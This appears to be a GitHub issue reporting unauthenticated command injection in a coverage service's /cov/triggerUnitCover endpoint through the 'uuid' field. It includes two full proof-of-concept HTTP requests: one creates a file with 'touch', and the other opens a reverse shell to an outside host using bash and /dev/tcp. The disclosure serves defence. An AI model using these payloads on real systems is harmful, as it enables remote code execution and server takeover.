Skip to content

Unauthorized attackers can execute any command with triggerUnitCover Interface #49

New issue
New issue
Open
Open
Unauthorized attackers can execute any command with triggerUnitCover Interface#49
@gaogaostone

Description

@gaogaostone
gaogaostone
opened on Oct 28, 2024

When accessing the triggerUnitCover Interface with special request, unauthorized attackers can execute any command on the target system. Attacker can inject command in the parameter uuid.

Proof of concept:

The request with file creation and results are as following.
After sending the payload, wait for a period of time (10 seconds by default). Once the scheduled task is executed, you will find that the file is successfully created.

POST /cov/triggerUnitCover HTTP/1.1
Host: x.x.x.x:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/json
Content-Length: 272

{
    "envType":"-Ptest",
  "subModule":"",
"uuid":"123yy || touch /tmp/0407_123 ||",
"gitUrl":"http://x.x.x.x:8080/root/haha.git",
"baseVersion":"7965193defdfb86692f6dfcf84f567b1c425f9e5",
"nowVersion":"fa8ffa7a44d469ee654e5b7a58bdb50539301f3d",
"type":"1"
}

image
image

The payload for reverse shell and execution results are as following.
After sending the payload, wait for a period of time (10 seconds by default). Once the scheduled task is executed, you will find that the file is successfully created.

POST /cov/triggerUnitCover HTTP/1.1
Host: x.x.x.x:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/json
Content-Length: 296

{
    "envType":"-Ptest",
  "subModule":"",
"uuid":"123yy || bash -i >& /dev/tcp/x.x.x.x/9333 0>&1 ||",
"gitUrl":"http://x.x.x.x:8080/root/haha.git",
"baseVersion":"7965193defdfb86692f6dfcf84f567b1c425f9e5",
"nowVersion":"fa8ffa7a44d469ee654e5b7a58bdb50539301f3d",
"type":"1"
}

image
image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions